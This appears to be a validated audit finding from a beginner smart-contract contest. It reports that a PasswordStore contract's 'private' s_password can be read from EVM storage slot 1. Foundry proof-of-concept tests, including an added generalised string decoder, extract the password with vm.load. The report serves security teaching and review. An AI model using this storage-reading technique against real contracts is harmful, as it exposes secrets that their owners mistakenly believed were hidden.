Beginner Friendly, Foundry
100 EXP
Submission Details
Severity: high
Valid

s_password can be read accessing EVM storage

Summary

The state variable s_password is declared private, but its value can still be read by loading the storage slot it occupies (slot 1 in this contract).

Vulnerability Details

The password is stored on-chain, so anyone can read it at any time.
Marking the variable private does not prevent it from being read externally; it only restricts access from other contracts at the Solidity level.
Here is a Proof of Concept unit test demonstrating the issue (add it to PasswordStoreTest.t.sol):

```solidity
function test_non_owner_can_read_password() public {
    vm.prank(owner);
    string memory expectedPassword = "myNewPassword";
    passwordStore.setPassword(expectedPassword);
    vm.prank(address(1));
    // Read slot 1 of the contract's storage, where s_password resides. A string shorter
    // than 32 bytes is stored left-aligned in its slot, so the first 13 bytes
    // (the length of expectedPassword) are the password itself.
    // vm.load reads raw storage directly, exactly as any node or explorer can off-chain.
    bytes13 slotOneValue = bytes13(vm.load(address(passwordStore), bytes32(uint256(1))));
    string memory actualPassword = string(abi.encodePacked(slotOneValue));
    assertEq(actualPassword, expectedPassword);
}
```
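As an added example (not part of the original submission), the following Foundry test generalises the PoC above: instead of hard-coding 13 bytes it decodes the stored string from the slot's length byte, and it also handles passwords longer than 31 bytes, whose data Solidity stores starting at keccak256(slot). It assumes the first-flight layout where the test imports PasswordStore from ../src/PasswordStore.sol, the constructor makes the deployer the owner, and s_password lives at slot 1 as stated above.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.18;

import {Test} from "forge-std/Test.sol";
import {PasswordStore} from "../src/PasswordStore.sol"; // assumed project path

contract StorageStringReaderTest is Test {
    PasswordStore passwordStore;

    function setUp() public {
        passwordStore = new PasswordStore(); // this test contract becomes the owner
    }

    /// Decode a `string` state variable stored at `slot` using Solidity's layout rules:
    /// short strings (<= 31 bytes) keep their data left-aligned in the slot with
    /// length*2 in the lowest byte; longer strings keep length*2+1 in the slot and
    /// the data starting at keccak256(slot).
    function readStringFromStorage(address target, uint256 slot) internal view returns (string memory) {
        bytes32 raw = vm.load(target, bytes32(slot));
        uint256 lowByte = uint256(raw) & 0xff;
        if ((lowByte & 1) == 0) {
            uint256 len = lowByte / 2;
            bytes memory shortOut = new bytes(len);
            for (uint256 i = 0; i < len; i++) shortOut[i] = raw[i];
            return string(shortOut);
        }
        uint256 length = (uint256(raw) - 1) / 2;
        bytes memory out = new bytes(length);
        uint256 base = uint256(keccak256(abi.encode(slot)));
        for (uint256 i = 0; i < length; i += 32) {
            bytes32 chunk = vm.load(target, bytes32(base + i / 32));
            for (uint256 j = 0; j < 32 && i + j < length; j++) out[i + j] = chunk[j];
        }
        return string(out);
    }

    function test_private_string_is_readable_regardless_of_length() public {
        // Short password (13 bytes): the whole value sits in slot 1, as in the report above.
        passwordStore.setPassword("myNewPassword");
        assertEq(readStringFromStorage(address(passwordStore), 1), "myNewPassword");

        // Long password (> 31 bytes): slot 1 now holds only the length; the data is at keccak256(1).
        string memory longPw = "this password is longer than thirty-one bytes so it uses the long layout";
        passwordStore.setPassword(longPw);
        assertEq(readStringFromStorage(address(passwordStore), 1), longPw);
    }
}
```

The same decoding can be done off-chain from any node's storage RPC, which is why changing the length or visibility of the variable does not help.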

Impact

Reading the password gives the attacker the ability to access funds or sensitive information.

Tools Used

Manual review.

Recommendations

Storing a password on-chain is considered bad practice: everything written to the chain is publicly visible.
At the very least, do not store it in plaintext; store an encrypted or hashed version instead.
Hashing brings its own problems, however, such as rainbow tables and similar precomputation attacks, so it does not make an on-chain secret truly secret.

Updates

Lead Judging Commences

inallhonesty Lead Judge
about 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

finding-anyone-can-read-storage

Private functions and state variables are only visible to the contract they are defined in, not to derived contracts. In this case, private doesn't mean secret/confidential.
